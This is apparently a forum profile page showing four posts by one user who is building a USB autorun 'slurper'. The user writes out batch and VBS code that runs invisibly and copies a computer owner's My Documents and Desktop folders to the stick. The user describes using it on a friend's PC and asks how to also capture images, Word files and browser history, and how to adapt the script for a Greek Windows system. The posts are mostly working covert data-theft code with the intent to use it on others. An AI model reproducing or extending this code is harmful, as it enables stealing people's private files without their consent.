Jump to content

myronhinio

Active Members
  • Posts

    7
  • Joined

  • Last visited

Posts posted by myronhinio

  1. i cannot make the slurper work!i must be somekind of retard:(>.

    i just extraxt the files of the rar in the root of my usb,double click the slurper.and then nothing happens.

  2. :) alright i tried it to my friends pc(windows vista)the other day i got the some pictures but not all of them.ie i didnt get any pic from the folder "my pictures".AND i tried it again to my windows xp and didnt work.:F

    is there any way search for pics of certain size:) thanks in advance again

  3. basically i tried to understand all that stuff but it seems quite strange to me. what i ve done is pretty much traditional,simple and straight forward to me !so here what ive done;i ve put an autorun an invis.vbs and 2 bat files.

    first bat is

    wscript.exe "%~d0\invis.vbs" "drivers.bat"

    and the second

    @echo off
    mkdir %~d0\%computername%
    xcopy "C:\Documents and Settings\%username%\My Documents" %~d0\%computername% /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop" %~d0\%computername% /s/c/q/r/h
    @cls
    @exit

    so what u sent to me will probably solve my problem but the thing is that i dont know how and where to put the code.i am pretty much interested in getting .jpeg,word files etc. and ie history.or just copying "my documents and desktop.(no prob since i got a 32 gb stick)so i dont think switch blade is the one for me.

    thx for anwsering hope this things dont sound too stupid to you:)

  4. i ve made a command and it works for my netbook which has english os .

    My main computers first language is greek and instead of "my documents" is "Τα έγγραφά μου" what can i do?if i just replace the command it doesnt work

    english code works :rolleyes:

    @echo off
    mkdir %~d0\%computername%
    xcopy "C:\Documents and Settings\%username%\My Documents" %~d0\%computername% /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop" %~d0\%computername% /s/c/q/r/h
    @cls
    @exit

    greek code doesnt work <_<

    @echo off
    mkdir %~d0\%computername%
    xcopy "C:\Documents and Settings\%username%\Τα έγγραφά μου" %~d0\%computername% /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Επιφάνεια εργασίας" %~d0\%computername% /s/c/q/r/h
    @cls
    @exit

    thx in advance and sorry if already posted i could nt find sth similar!

×
×
  • Create New...